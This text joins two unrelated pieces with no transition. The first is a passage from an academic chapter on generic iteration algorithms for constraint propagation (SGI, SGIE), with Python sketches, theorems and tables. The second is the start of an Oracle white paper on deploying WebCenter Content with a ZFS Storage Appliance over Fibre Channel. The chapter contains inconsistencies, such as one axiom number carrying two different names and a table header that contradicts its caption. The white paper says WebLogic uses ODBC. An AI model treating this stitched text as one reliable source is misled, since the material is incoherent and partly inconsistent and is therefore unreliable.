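As a concrete companion to Algorithm 3.4.1, the following Python sketch (all names hypothetical, not the author's code) implements SGIIS for idempotent, stationary functions: the set `scheduled` records every function ever placed in $G$, so the update operator, as in the Stationarity Axiom 3.4.1(ii), never schedules a function twice.

```python
def sgiis(bot, f_bot, funcs):
    # SGIIS sketch: `scheduled` records every function ever put in G,
    # mirroring the union over the sets G_k in Axiom 3.4.1(ii), so no
    # function is iterated more than once after the F_bot pass
    # (stationarity); idempotent functions are never re-added right
    # after firing.
    o = bot
    G = []
    scheduled = set(f_bot)

    def update(o_old, o_new):
        # not yet scheduled, fixed the old value, but not the new one
        fresh = [f for f in funcs
                 if f not in scheduled and f(o_old) == o_old and f(o_new) != o_new]
        scheduled.update(fresh)
        return fresh

    for g in list(f_bot):          # outer loop: drain F_bot once
        o_new = g(o)
        if o_new != o:
            G.extend(update(o, o_new))
            o = o_new
        while G:                   # inner loop: drain G, as in Algorithm 3.4.1
            g = G.pop()
            o_new = g(o)
            if o_new != o:
                G.extend(update(o, o_new))
                o = o_new
    return o

f1 = lambda s: s | {1}                   # f1(bot) != bot, so f1 belongs to F_bot
f2 = lambda s: s | {2} if 1 in s else s  # stationary and idempotent
print(sorted(sgiis(frozenset(), [f1], [f1, f2])))  # -> [1, 2]
```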
The Stationarity Lemma 3.4.9 and the Idempotency Lemma 3.4.3 allow us to transfer, to SGIIS, all the results concerning SGI as summarised in Corollary 3.3.12.
**Theorem 3.4.10.**
(i). Assume the Stationarity Axiom 3.4.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then every execution of SGIIS terminates by computing the least common fixpoint of the iterated functions.
(ii). Assume the Stationarity Axiom 3.4.1, the Least Fixpoint Axiom 3.3.2, and that the \( F \) functions are defined on a finite partial ordering with bottom \( (O, \sqsubseteq, \perp) \). Then every execution of SGIIS terminates by computing the least common fixpoint of the iterated functions. \( \square \)
3.4.3 Iterations Modulo Equivalence
The SGI algorithm with Equivalence (SGIE) is SGI with functions defined on an equivalence structure \((V, \equiv)\), and such that the if conditional depends on the equivalence of the input and output values, and not necessarily on their identity; see Algorithm 3.4.2. As for SGI, the update operator selects and returns functions of \(F^V\). Thus this algorithm iterates functions from a set \(F^V\) until a value \(v\) is found for which \(g^V(v) \equiv v\) for all the iterated functions \(g^V\). Indeed, if the equivalence relation \(\equiv\) collapses into the identity, we obtain the SGI algorithm back.
Algorithm 3.4.2: SGIE(\(\bot, \equiv, F_\bot, F\))
\[
v := \bot^V; \\
G^V := F_\bot^V; \\
\textbf{while } G^V \neq \emptyset \textbf{ do} \\
\quad \text{choose } g^V \in G^V; \\
\quad G^V := G^V - \{g^V\}; \\
\quad v' := g^V(v); \\
\quad \textbf{if } v' \not\equiv v \textbf{ then } G^V := G^V \cup \text{update}(F^V, g^V, v); \\
\quad v := v'; \\
\textbf{end while}
\]
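A small executable sketch of SGIE may help (hypothetical names; the update operator shown is just one admissible choice, since the schema leaves it unspecified): the loop has the shape of Algorithm 3.4.2, with the guard testing equivalence rather than identity. The values carry a counter as a stand-in support structure that the equivalence relation "scrapes away".

```python
def sgie(bot, equiv, f_bot, funcs):
    # SGIE sketch: same loop shape as SGI, but the guard uses `equiv`
    # instead of identity; this update re-schedules every function that
    # moves the new value to an inequivalent one.
    v = bot
    G = list(f_bot)
    while G:
        g = G.pop()
        v_new = g(v)
        if not equiv(v_new, v):
            G = [f for f in funcs if not equiv(f(v_new), v_new)]
            v = v_new
    return v

# values are (domain, counter) pairs: the counter is a support structure
# that the equivalence relation ignores
equiv = lambda a, b: a[0] == b[0]
g1 = lambda v: (v[0] | {1}, v[1] + 1)
g2 = lambda v: (v[0] | {2} if 1 in v[0] else v[0], v[1] + 1)

v = sgie((frozenset(), 0), equiv, [g1], [g1, g2])
print(sorted(v[0]))  # -> [1, 2]
```

All terminating runs end in the same $\equiv$-class (the first component is always $\{1, 2\}$), even though the counter in the second component may differ between runs.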
**Note 3.4.11.** We let \(\text{update}(F^V, g^V, v)\) be an unspecified subset of \(F^V\). In fact, in the case of the SGIE algorithm schema, the update operator varies according to the instance CSP algorithms. However, as far as the results in this part are concerned, we do not need to assume anything more of update than that it returns a subset of the \(F^V\) functions.
**SGIE iterations**
As in the case of SGI, we associate SGIE traces with executions of an SGIE algorithm. Again, notice that the identity function \(id^V\) on \(V\) does not affect any value in any computation of SGIE; i.e., \(id^V(v) \equiv v\) for every \(v \in V\).
The SGIE traces \((v_n, G^V_n) : n \in \mathbb{N}\) of executions of the SGIE algorithm are defined like the SGI traces:
- \(v_0 := \bot_V, G^V_0 := F^V_\bot\):
- suppose that \(v_n\) and \(G^V_n\) are the input of the \(n\)-th while loop of SGIE. If \(G^V_n\) is the empty set, then \(v_{n+1} := v_n\) and \(G^V_{n+1} := \emptyset\). Otherwise, let \(g^V\) be the chosen function and set \(v_{n+1}\) equal to \(g^V(v_n)\). Then the set \(G^V_{n+1}\) is defined as \(G^V_n - \{g^V\} \cup \text{update}(F^V, G^V_n, g^V, v_n)\) if \(v_{n+1} \neq v_n\), otherwise as the set \(G^V_n - \{g^V\}\).
The iteration \( \langle v_n : n \in \mathbb{N} \rangle \) is called an SGIE iteration of SGIE.

As in the case of SGI, traces are useful to formulate and study termination conditions on SGIE. So we shall say that the SGIE trace stabilises at \( v_n \) if the iteration \( \langle v_n : n \in \mathbb{N} \rangle \) does so and \( G_n^V = \emptyset \). The following equivalence will be useful in what follows.

**Fact 3.4.12.** An iteration of an SGIE algorithm terminates by computing \( v \) iff the associated trace stabilises at \( v \).
**The least \( \equiv \)-class and termination**
Suppose that we can devise a partial order \( \sqsubseteq \) on a quotient set \( O \) isomorphic to \( V/\equiv \), such that \( \langle O, \sqsubseteq, \bot^O \rangle \) turns out to be a partial ordering with bottom. Then we can try to transfer the analysis and results concerning SGI, over the partial ordering \( \langle O, \sqsubseteq, \bot^O \rangle \), to SGIE over the equivalence structure \( \langle V, \equiv \rangle \).
Let \( F^V \) and \( F^O \) be, respectively, a finite set of functions over \( V \) and \( O \). Consider a bijective map \( f : F^O \rightarrow F^V \) that maps the identity of \( F^O \) to the identity function of \( F^V \). Let us denote
\[
f^V := f(f^O),
\]
for each \( f^O \in F^O \). Now, suppose that an SGIE trace \( \langle (v_n, G_n^V) : n \in \mathbb{N} \rangle \) of \( F^V \) functions can be associated with an SGI trace \( \langle (o_n, G_n^O) : n \in \mathbb{N} \rangle \) of \( F^O \) functions via \( f \), and that such traces enjoy the following property:
1. \( v_0 \in o_0 \);
2. for every \( n \geq 0 \), if \( v_{n+1} = f^V(v_n) \) for \( f^V \in G_n^V \) then \( o_{n+1} = f^O(o_n) \) for \( f^O \in G_n^O \), and the following property holds:
there exists \( m \geq n + 1 \) such that \( v_m \in o_m \).
Then the two traces \( \langle (v_n, G_n^V) : n \in \mathbb{N} \rangle \) and \( \langle (o_n, G_n^O) : n \in \mathbb{N} \rangle \) are called \( \equiv \)-equivalent via \( f \).
The characterisation of \( \equiv \)-equivalence, via a function \( f \), is sufficient to obtain the following result.
**Lemma 3.4.13.** Consider an SGI trace \( o := \langle o_n : n \in \mathbb{N} \rangle \) and an \( \equiv \)-equivalent SGIE trace \( v := \langle v_n : n \in \mathbb{N} \rangle \).
- The trace \( v \) stabilises at a value \( v \in V \) if the trace \( o \) does so at a value \( o \in O \);
- furthermore, the value \( o \in O \) (where \( O \) is isomorphic to \( V/\equiv \)) corresponds to the \( \equiv \)-class of \( v \).
**Proof.** Suppose that \( \langle o_n : n \in \mathbb{N} \rangle \) stabilises at \( o_n \). Then \( G_n^O = \emptyset \), hence \( G_n^V \) is empty due to the definition of equivalent traces above. Then \( v_n \in o_n \) follows from the above definition. Therefore \( \langle (v_n, G_n^V) : n \in \mathbb{N} \rangle \) stabilises at \( v_n \in o_n \). \( \square \)
The following definition extends the notion of \( \equiv \)-equivalence between traces to an analogous notion between algorithm executions.
**Definition 3.4.14.** If there exists a map \( f \) such that every SGIE trace with \( F^V \) is \( \equiv \)-equivalent to an SGI trace with \( F^O \) via \( f \), then SGIE with \( F^V \) is called \( \equiv \)-equivalent to SGI with \( F^O \).
The following theorem is a consequence of Facts 3.3.6 and 3.4.12, and the above Lemma 3.4.13.
**Theorem 3.4.15.** Suppose that every execution of SGI terminates by computing the least common fixpoint \( o \) of the \( F^O \) functions. If SGIE with \( F^V \) functions over \( \langle V, \equiv \rangle \) is \( \equiv \)-equivalent to SGI, then every execution of SGIE terminates by computing \( \equiv \)-equivalent values; i.e. values \( v \) in the \( \equiv \)-class that corresponds to \( o \). \( \square \)
Theorem 3.4.15 above implies that we can study instances of the SGIE schema (which takes as input a set \( V \) with an equivalence relation) if we can provide, for them, equivalent instances of the SGI algorithm schema:
1. we devise a partial ordering with bottom on a set \( O \), isomorphic to the quotient set \( V/\equiv \);
2. then we check whether the given instance of SGIE on \( V \) is \( \equiv \)-equivalent to an instance of SGI on \( O \), with suitable functions on \( O \);
3. if this equivalence holds, then Theorem 3.4.15 implies that, if SGI terminates by always computing the same value, then SGIE terminates by always computing values which belong to the same equivalence class.
These transfer results, summarised in the corollary below, are consequences of Theorem 3.4.15 and of Corollary 3.3.12 for SGI.
**Corollary 3.4.16.** Consider an instance of SGI with \( F^O \) functions on a finite partial ordering \( O := (O, \sqsubseteq, \perp^O) \). Let SGIE be instantiated with \( F^V \) functions on an equivalence structure \( (V, \equiv) \) whose quotient set \( V/\equiv \) is isomorphic to \( O \). Furthermore, suppose that this instance of SGIE is \( \equiv \)-equivalent to the instance of SGI with the \( F^O \) functions on the partial ordering \( O \). Thus we have the following results:
- if the \( F^O \) functions are inflationary, then every execution of SGIE with the \( F^V \) functions on \( V \) terminates;
- if the $F^O$ functions are also monotone, then every execution of SGIE with the $F^V$ functions on $V$ terminates, by computing values which are all in the $\equiv$-class of the least common fixpoint of the $F^O$ functions. $\square$
**Variations of SGIE**
All versions of SGI can be modified similarly, so as to generate a corresponding version of SGIE. However, in Chapter 4, we only deal with the following variations of SGIE:
- the GI algorithm (see Subsection 3.4.1) with equivalence, namely GIE;
- the SGIIS algorithm (see Algorithm 3.4.1) with equivalence, denoted by SGIISE.
All these algorithms share the same parameters, which are specified as follows:
- an equivalence structure, namely a set $V$ and an equivalence binary relation $\equiv$ on it;
- $\bot^V$, an element of $V$;
- a finite set $F^V$ of functions $f^V : V \rightarrow V$;
- a subset $F_\bot^V$ of $F^V$ that contains every $F^V$ function $f^V$ for which $f^V(\bot) \neq \bot$;
- the update operator, which selects and returns a subset of the $F^V$ functions.
The definitions and results given above for SGIE are easily extended to the cases of GIE and SGIISE. We leave the task of filling in the details to the reader.
3.5 Conclusions
3.5.1 Synopsis
This chapter presents a basic algorithm schema, SGI, and some of its variations. The SGI schema iteratively applies functions until a common fixpoint of theirs is found: the Common Fixpoint Axiom 3.3.1 provides a sufficient property for this, and characterises the basic strategy of SGI. Then Axioms 3.3.2 and 3.3.3 state sufficient properties for SGI to find the least common fixpoint of the functions and to terminate, respectively. Notice that all those properties are encountered in most constraint propagation algorithms, see Chapter 4 below; there, the SGI schema or its variations are used as “templates” to explain and differentiate those algorithms.
Variations of the basic schema are thus studied in Section 3.4: they are differentiated in terms of update and properties of functions; these differences account
for different strategies of the algorithms in Chapter 4. Besides, some of those algorithms use additional support structures, so to speak: i.e., they remove values from the given CSP domains or constraints by storing information in other structures. In those cases SGIE, namely SGI on a set equipped with an equivalence relation, proves useful: first the algorithms are instantiated to SGIE; then the additional structures are "scraped away" through the adopted equivalence relation, so that SGI can be used to analyse those algorithms too. These instances of SGI iterate functions that only remove values from domains or constraints, and do so in a monotone and inflationary manner; thus we are able to transfer the results obtained for SGI instances to SGIE instances.
Some of the main variations of SGI and SGIE are summarised in the following table, whose rows contain, from left to right:
- a variation of SGI or SGIE;
- the related properties of functions;
- where the related update operator is characterised;
- where a variation is applied in Chapter 4, which deals with constraint propagation algorithms for CSPs — these are introduced in Chapter 2.
| SGI & SGIE Variations | Properties of Functions | The update Operator | Where in Chapter 4 |
|---|---|---|---|
| SGIIS | idempotency, stationarity | Idempotency Lemma 3.4.3, Stationarity Lemma 3.4.9 | (H)AC–4, (H)AC–5, PC–4 |
| SGIISE | | | |
| GI | | Common Fixpoint Axiom 3.3.1 | (H)AC–1, PC–1, RC_{(i,m)} |
| GIC | commutativity | Commutativity Lemma 3.4.6 | AC–3 |
| GIIS | idempotency, stationarity | Idempotency Lemma 3.4.3, Stationarity Lemma 3.4.9 | KC |
| GIISE | | | |
Chapter 5 concerns itself with non-standard CSPs that allow us to obtain optimal partial solutions, according to certain criteria: the original algorithm schema for constraint propagation is extended via SGI. In Chapter 2 and Sections 5.4 and 5.5 of Chapter 5, we also apply the results of the present chapter as displayed in the following table, which shows how properties of functions or update are correlated to properties of algorithms in both Chapters 2 and 5.
| Properties of update or Functions | Properties of Algorithms | Where in Chapter 4 | Where in Chapter 5 |
|---|---|---|---|
| Common Fixpoint Axiom 3.3.1 | partial correctness | Corollaries 4.2.4, 4.2.6, 4.2.12, 4.2.15, 4.2.16, 4.3.5, 4.3.7, 4.3.12, 4.4.7, 4.5.4 | Corollary 5.4.4 |
| Monotonicity Axiom 3.3.2 | confluence | as above | Corollaries 5.4.5 and 5.4.6 |
| Inflationarity Axiom 3.3.3 | termination | as above | Corollaries 5.4.7, 5.4.14 and 5.4.15 |
3.5.2 Discussion
Using a single framework for presenting constraint propagation algorithms makes it easier to verify and compare these algorithms. Again from a theoretical viewpoint, this approach allows us to separate the properties that concur in the definition of a constraint propagation algorithm: e.g., inflationarity is related to termination and absence of backtracking; monotonicity to confluence; stationarity, commutativity and idempotence explain optimised strategies for various constraint propagation algorithms. Preserving equivalence is another important property of those algorithms: in such a general setting, we cannot tackle it, since we study functions on “generic” sets, i.e., not on CSPs. Nonetheless, in Chapter 4, it is always easy to prove, by means of the adopted functions, that constraint propagation algorithms maintain equivalence.
From an applicative viewpoint, this approach allows us to parallelise constraint propagation algorithms in a simple and uniform way, resulting in a general framework for distributed constraint propagation algorithms; see [Mon00]. This shows that constraint propagation can be viewed as the coordination of cooperative agents. Additionally, such a general framework facilitates the combination of these algorithms, a property often referred to as solver cooperation or combination. Finally, the generic iteration algorithm SGI and its specialisations can be used as a template for deriving specific constraint propagation algorithms in which specific scheduling strategies are employed.
An Oracle Technical White Paper
January 2014
v1.1
How to Deploy Oracle WebCenter Content on the Oracle ZFS Storage Appliance
Overview
Prerequisite Setup
Overview of Required Tasks
Configuring the Storage Network Infrastructure
Configuring the Oracle ZFS Storage Appliance
Configuring the Oracle ZFS Storage Appliance FC Targets
Configuring the Oracle ZFS Storage Appliance FC Target Group
Determining the FC Initiator HBA WWNs
Determining the FC Initiator HBA WWNs under Oracle Solaris 11
Determining the FC Initiator HBA WWNs under Oracle Enterprise Linux
Configuring the FC Initiators
Configuring the FC Initiator Group
Configuring the Required Storage for the Database
Defining a Sun ZFS Storage Appliance Project
Creating the LUNs for the Database Host
Creating the Oracle WebLogic Repository on the Database Host
Creating the ASM Disk Groups
Creating the Database on the ASM Disk Groups
Installing the Oracle Fusion Middleware Components
Creating the Oracle Fusion Middleware Repository
Installing Oracle WebLogic
Installing WebCenter Content
Configuring the Oracle WebLogic Domain
Starting the Administration Server / Oracle WebLogic
Starting the Node Manager
Performing Runtime Configuration of WebCenter Content
Conclusion
References
Overview
Oracle WebCenter Content is a highly integrated Enterprise Content Management (ECM) platform allowing the consolidation of unstructured content in a flexible and secure management system. Oracle WebCenter Content allows the management of content as a strategic asset and the integration of enterprise applications and business processes.
The basic architectural features of Oracle ZFS Storage Appliance are designed to provide high performance, flexibility and scalability. Besides its easy-to-use interface and detailed metrics using its DTrace Analytics tool, Oracle ZFS Storage Appliance features a unique Oracle integration with Hybrid Columnar Compression that delivers 3x to 5x better storage efficiency for Oracle databases with in-database archiving.
By using the features of Oracle Database, Oracle Grid Infrastructure and Oracle ZFS Storage Appliance, a rapid deployment of a secure ECM environment is made possible.
This document describes the minimum steps required to deploy Oracle WebCenter Content using the Oracle ZFS Storage Appliance as the infrastructure for holding the back-end database.
NOTE: References to Sun ZFS Storage Appliance, Sun ZFS Storage 7000, and ZFS Storage Appliance all refer to the same family of Oracle ZFS Storage Appliance products. Some cited documentation or screen code may still carry these legacy naming conventions.
Oracle WebCenter Content is built on and integrates with Oracle Fusion Middleware components. Oracle WebCenter Content provides all the tools needed to create the back-end schema required to support the middleware applications.
Oracle WebLogic is the Oracle Fusion Middleware component set that controls and monitors Oracle WebCenter Content component applications. Oracle WebLogic also provides access to the back-end database through Open Database Connectivity (ODBC) libraries.
Oracle WebLogic is built on the concept of Oracle WebLogic server domains, which contain one administration server and one or more managed servers (such as Oracle WebCenter).
The steps to deploy Oracle WebCenter Content with an Oracle ZFS Storage Appliance infrastructure involve creating these middleware building blocks, as seen in the basic architecture shown in Figure 1.
Figure 1. Logical architecture
The database and Oracle WebLogic hosts may be located on the same server or, for performance or administration reasons, they may be hosted on different servers. In the example shown in this document, they are installed on the same host, but their logical functions are still distinct.
Installing the correct versions of the individual components is very important. In order to ensure smooth deployment, the Oracle web site has the necessary links for the correct component version downloads at:
Prerequisite Setup
Note the following assumptions regarding existing setup upon which the WebCenter Content deployment steps depend:
- A known root password for the Oracle ZFS Storage Appliance exists.
- A known IP address or hostname of the Oracle ZFS Storage Appliance exists.
- A network used by the Oracle ZFS Storage Appliance that is already configured exists.
- Configured pools with sufficient free space available on the Oracle ZFS Storage Appliance exist.
- A known root password for the database and Oracle WebLogic server exists.
- Oracle Grid Infrastructure has been installed on the database server.
- Oracle Database has been installed on the database server.
Overview of Required Tasks
Deploying WebCenter Content requires configuring four primary components of the architecture shown in Figure 1: the Oracle ZFS Storage Appliance, the Oracle Database back end, and the Oracle Fusion Middleware components – the Oracle WebLogic management software and, within it, Oracle WebCenter Content. The following tasks are required to install and/or configure these components:
- Configuring the storage network infrastructure
- Configuring the Oracle ZFS Storage Appliance
- Presenting the required storage resources to the database server
- Configuring the back-end Oracle Database – Creating the database for backend storage on the database server
- Configuring the Oracle WebLogic Repository
- Installing and configuring the Oracle Fusion Middleware components
- Installing WebCenter Content
- Configuring the Oracle WebLogic domain
- Creating and assigning the middleware application servers
- Starting the middleware application servers
- Performing the WebCenter Content configuration
Configuring the Storage Network Infrastructure
The choice of which block-level protocol and infrastructure to use depends on local policy and any existing connections between the Oracle ZFS Storage Appliance and the database host.
The Oracle ZFS Storage Appliance supports all major protocols, including CIFS (Common Internet File System), NFS (Network File System), FC (Fibre Channel), iSCSI (Internet Small Computer System Interface) and IB (Infiniband). The choice of storage network infrastructure is outside the scope of this document.
For the purposes of this document, the storage network infrastructure is assumed to be Fibre Channel and all the necessary zoning has been performed on the fabric switches.
Tutorials on creating iSCSI LUNs and Fibre Channel LUNs for use in Oracle Solaris, Oracle Linux or Microsoft Windows Server 2008 R2 environments are available at the Oracle Technology Network information web site, under Sun NAS Storage Documentation at:
Configuring the Oracle ZFS Storage Appliance
The following tasks, depending on the implementation category, are required to configure the Oracle ZFS Storage Appliance. These steps need only be carried out once and can be omitted if successfully completed beforehand:
- Configure the FC targets.
- Configure the FC target group.
If no LUNs are being or have been presented to the database host, the following tasks are necessary:
- Determine the FC initiator Host Bus Adapter (HBA) World Wide Names (WWN).
- Configure the FC initiators.
- Configure the FC initiator group.
Perform the following steps whenever a new storage allocation will be made:
1. Create the LUN with the required attributes.
2. Present the LUN to the FC initiator group through the FC target group.
Configuring the Oracle ZFS Storage Appliance FC Targets
The FC targets are configured on the Oracle ZFS Storage Appliance to identify the appliance to the fabrics to which it will be attached.
The FC targets are defined by the HBA WWNs installed in the Oracle ZFS Storage Appliance. These FC targets are used not only within the Oracle ZFS Storage Appliance but also in any FC switches to provide the correct zoning information to ensure that only the appropriate devices can communicate. The method of zoning depends on the switch manufacturer. Reference the documentation provided by the manufacturer for details on required operations.
To configure the FC target, first establish a management session with the Oracle ZFS Storage Appliance.
1. Enter an address in the address field of a web browser that includes the IP address or hostname of the Oracle ZFS Storage Appliance:
https://<ip-address or hostname>:215
The login dialog window shown in Figure 2 is displayed.

2. Enter a **Username** and **Password** and click **LOGIN**.
Once you have successfully logged in to the BUI, identify the FC target WWNs by navigating through the Configuration > SAN > Fibre Channel > Ports tabs, as highlighted in Figure 3.
In the example, port 1 has the WWN 21:00:00:e0:8b:92:a1:cf and port 2 has the WWN 21:01:00:e0:8b:b2:a1:cf.
The FC channel ports should be set to Target in the dropdown box to the right of the individual FC port box. If this is not the case, the FC port may be in use for another purpose; do not change this setting until it has been investigated (a possible additional purpose may be for NDMP backups).
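For scripted environments, the management URL format used in step 1 above can be built and probed from the shell. This is a minimal sketch; the `bui_url` helper name and the appliance hostname are placeholders, not part of the appliance software:

```shell
#!/bin/sh
# Build the Oracle ZFS Storage Appliance BUI address (hypothetical helper).
# The BUI always listens on HTTPS port 215.
bui_url() {
    printf 'https://%s:215\n' "$1"
}

# Probe reachability from the management network (self-signed
# certificate, hence -k):
#   curl -k --head "$(bui_url zfssa.example.com)"
```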
Configuring the Oracle ZFS Storage Appliance FC Target Group
The FC target group’s purpose is to define upon which protocol and which interfaces LUNs will be presented and accessed. In order to create the FC target group, follow these steps:
1. While still in the Configuration > SAN > FC Channel > Ports display as shown in Figure 3, place the mouse pointer on one of the FC target ports. A 'move' icon appears to the left of the port box.
2. Click and hold the mouse button on the ‘move’ icon and drag the box to the Fibre Channel Target Groups area as shown in Figure 4.
3. Drop the entry in the orange box to create a new target group. The group is created automatically and is given a name like ‘targets-n’ where ‘n’ is an integer. An example is shown in Figure 5.

Move the cursor over the entry for the new target group. Two icons appear to the right of the target group box as shown in Figure 5.
4. Click the Edit icon to display the dialog in Figure 6.

5. Enter the name for the FC target group in the Name box. The example in Figure 6 shows the newly entered name FC-PortGroup. At this point, you can also add any additional FC target ports by selecting the checkbox to the left of the appropriate WWN. The FC port is added to the target group. In the example, the port PCIe 1: Port 2 will be added to FC-PortGroup.
6. Click OK to save the changes.
7. Click Apply to commit all the changes made. Once the entries are successfully committed, the screen will resemble Figure 7.

**Determining the FC Initiator HBA WWNs**
In order to properly configure the Oracle ZFS Storage Appliance FC initiators and initiator groups, you must know the HBA WWNs that will represent the database host.
The FC initiator HBA WWNs are used to define which hosts have access to volumes presented by the Oracle ZFS Storage Appliance. These HBA WWNs are also used in the fabric zoning to define which host can access the Oracle ZFS Storage Appliance at all.
SAN Best Practices state that the security model deployed should be the 'Least Access' one – that is, the least number of devices able to communicate. This is done not only to maintain data security and data integrity but also to reduce the amount of unnecessary FC traffic. In terms of data integrity, unless a clusterable (or shared) filesystem or volume manager is being used (such as Oracle ASM), if more than one host writes to a given volume concurrently, inconsistencies may occur in the in-core filesystem caches in the hosts. Those inconsistencies may ultimately lead to corruption of the on-disk image or a server crash.
The method for gathering the WWNs depends on the operating system of the database host. The following shows methods for Oracle Solaris and Oracle Linux.
Determining the FC Initiator HBA WWNs under Oracle Solaris 11
Log on to the Oracle Solaris 11 host in a terminal session, become root, and issue the following command:
```
sol11host # fcinfo hba-port
HBA Port WWN: 230000144fb8130c
OS Device Name: /dev/cfg/c1
Manufacturer: QLogic Corp.
Model: 2200
Firmware Version: 02.01.145
FCode/BIOS Version: ISP2200 FC-AL Host Adapter Driver: 1.15
Serial Number: not available
Driver Name: qlc
Driver Version: 20090929-2.32
Type: L-port
State: online
Supported Speeds: 1Gb
Current Speed: 1Gb
Node WWN: 220000144fb8130c
HBA Port WWN: 210000e08a91bf8e
OS Device Name: /dev/cfg/c12
Manufacturer: QLogic Corp.
Model: 375-3294-01
Firmware Version: 05.01.02
FCode/BIOS Version: BIOS: 1.04; fcode: 1.11; EFI: 1.00;
Serial Number: 0402R00-0633171958
Driver Name: qlc
Driver Version: 20090929-2.32
Type: N-port
State: online
Supported Speeds: 1Gb 2Gb 4Gb
Current Speed: 4Gb
Node WWN: 200000e08a91bf8e
HBA Port WWN: 210100e08a91bf8e
OS Device Name: /dev/cfg/c13
Manufacturer: QLogic Corp.
Model: 375-3294-01
Firmware Version: 05.01.02
FCode/BIOS Version: BIOS: 1.04; fcode: 1.11; EFI: 1.00;
Serial Number: 0402R00-0633171958
Driver Name: qlc
Driver Version: 20090929-2.32
Type: N-port
State: online
Supported Speeds: 1Gb 2Gb 4Gb
Current Speed: 4Gb
Node WWN: 200100e08a91bf8e
```
As can be seen from the previous output, there are three FC ports available. The first is the embedded FC controller. The remaining two FC ports are the ones of interest – the N-ports with HBA port WWNs 210000e08a91bf8e and 210100e08a91bf8e, which will be used in the fabric zoning and the FC initiator definitions.
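Where only the HBA port WWNs are needed (for zoning and the initiator definitions), they can be filtered out of the `fcinfo` output. The following is a sketch; the `list_wwns` function name is an assumption, and the filter reads stdin so it can be exercised on captured output:

```shell
#!/bin/sh
# Print only the HBA port WWNs from `fcinfo hba-port` output.
# Reading stdin keeps the filter usable on captured output as well.
list_wwns() {
    awk -F': ' '/^HBA Port WWN/ {print $2}'
}

# Typical use on the Solaris host (as root):
#   fcinfo hba-port | list_wwns
```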
**Determining the FC Initiator HBA WWNs under Oracle Linux**
Log on to the Oracle Linux host in a terminal session, become root, and issue the following command:
```
[root@x4450-1 ~]# systool -c fc_host -A port_name
Class = "fc_host"

  Class Device = "host10"
    port_name           = "0x2101001b322b5eb6"
  Device = "host10"

  Class Device = "host9"
    port_name           = "0x2100001b320b5eb6"
  Device = "host9"
```
Here, the WWNs of interest are 0x2101001b322b5eb6 and 0x2100001b320b5eb6. These WWNs will be used to define the zoning on the FC switches and the FC initiators in the Oracle ZFS Storage Appliance.
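On Linux, the same port WWNs are also exposed directly in sysfs, so they can be read without extra tooling. This is a sketch; the `show_port_names` helper is hypothetical, and its root-directory parameter exists only so the loop can be exercised against a test tree:

```shell
#!/bin/sh
# List each FC host adapter and its port WWN from sysfs.
# $1 optionally overrides the filesystem root (defaults to /).
show_port_names() {
    root="${1:-}"
    for f in "$root"/sys/class/fc_host/host*/port_name; do
        [ -e "$f" ] || continue          # no FC adapters present
        host="${f%/port_name}"           # .../fc_host/host9
        printf '%s %s\n' "${host##*/}" "$(cat "$f")"
    done
}

# Typical use on the database host:
#   show_port_names
```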
**Configuring the FC Initiators**
The FC initiator serves to define the “host” to the Oracle ZFS Storage Appliance. In a traditional dual-fabric SAN, the host will be defined by at least two FC initiators. The FC initiator definition contains the host WWNs.
Using the example, identify the database host to the Oracle ZFS Storage Appliance by way of the FC initiator HBA WWNs discovered in the previous section.
1. Click Configuration>SAN>Fibre Channel to display the Storage Area Network (SAN) screen shown in Figure 8.
2. Select **Initiators** on the left panel as shown in Figure 8.
3. Click the icon to the left of **Initiators** to display the New Fibre Channel Initiator dialog shown in Figure 9.
4. If the zoning has been configured on the FC switches, the WWNs of the Oracle Solaris host should be displayed (assuming they have not been assigned to an alias already).
5. Click on one of the WWNs (if displayed at the bottom of the dialog box) to prepopulate the World Wide Name field, or type the appropriate WWN into the World Wide Name box.
6. Enter a more meaningful symbolic name as the **Alias**.
7. Click **OK**.
8. Repeat steps 3 – 7 for the other WWNs that refer to the database host.
### Configuring the FC Initiator Group
Related FC initiators are combined into logical groups to allow single commands to be executed on multiple FC initiators, such as assigning LUN access to all FC initiators in a group. For this example, the FC initiator group will contain two initiators. In a cluster, where multiple servers are treated as a single logical entity, the initiator group may contain many more initiators.
To create an FC initiator group, complete these steps:
1. Select Configuration > SAN to display the Storage Area Network (SAN) screen.
2. Select the Fibre Channel tab at the right and then click Initiators on the left panel.
3. Place the cursor over the entry for one of the FC initiators created in the previous section. The Move icon appears to the left of the entry as shown in Figure 10.
4. Click the icon and drag it to the Initiator Groups panel on the right. A new entry appears at the bottom of the Initiator Groups panel as shown in Figure 11 (highlighted in yellow).
5. Move the cursor over the new entry box and release the mouse button. A new FC initiator group is created with a name initiators-n, where n is an integer, as shown in Figure 12.
6. Move the cursor over the entry for the new initiator group. Several icons appear to the right of the initiator group box as shown in Figure 12.
Figure 10. Displaying the Move icon for the new FC initiator
Figure 11. Creating the FC initiator group
Figure 12. Selecting the FC initiator group
7. Click the Edit icon to display the edit dialog.
8. In the **Name** field, replace the default name with the name to be used for the FC initiator group and click **OK**. For this example, the name `ucm-dbserver` is used.
9. Additionally, the other FC initiator(s) can be added to the group at this time by clicking in the check box to the left of the WWN as seen in Figure 13.
Figure 13. Renaming and completing the FC initiator group
10. Click **APPLY** on the SAN configuration screen to confirm all the modifications as shown in Figure 14.
Figure 14. FC initiator configuration complete
Configuring the Required Storage for the Database
Still logged in to the Oracle ZFS Storage Appliance BUI, you now create the LUNs that will be presented to the database host. The first step for this operation is to create a project. Projects are used to group related filesystem and/or block-access LUNs for administrative purposes such as space management and common settings. Once the project is created, the storage required for the database host use will be allocated.
Defining an Oracle ZFS Storage Appliance Project
To create a project, complete the following steps:
1. Select Shares > Projects to display the Projects screen as shown in Figure 15.

2. To create a new project, enter a Name for the project and click APPLY. A new project appears in the Projects list in the left panel.
3. Select the new project to view the components that comprise the project, as shown in Figure 17.

Creating the LUNs for the Database Host
LUNs will now be created from the existing pool of storage resources. These LUNs will hold not only the data files for the WebCenter Content Manager backend database but also a flash recovery area (FRA) as required by Oracle Database configuration best practices.
To obtain optimal performance for the database access, the LUNs should be created with a block size of 64K and provisioned from a RAID-1 pool, as the database serving WebCenter Content Manager can be viewed as a general purpose database.
One difference from the recommendations provided in the listed document is that there will be no segregation of redo and archive logs; Oracle Automatic Storage Management (ASM) will provide the volume and placement management of the database components.
To create the LUNs, follow these steps:
1. Select the Shares > Projects tabs and click the ‘UCM’ project name as shown in Figure 18.
2. Click on the LUNs title.
3. Click the icon to display the Create LUN dialog window shown in Figure 19.
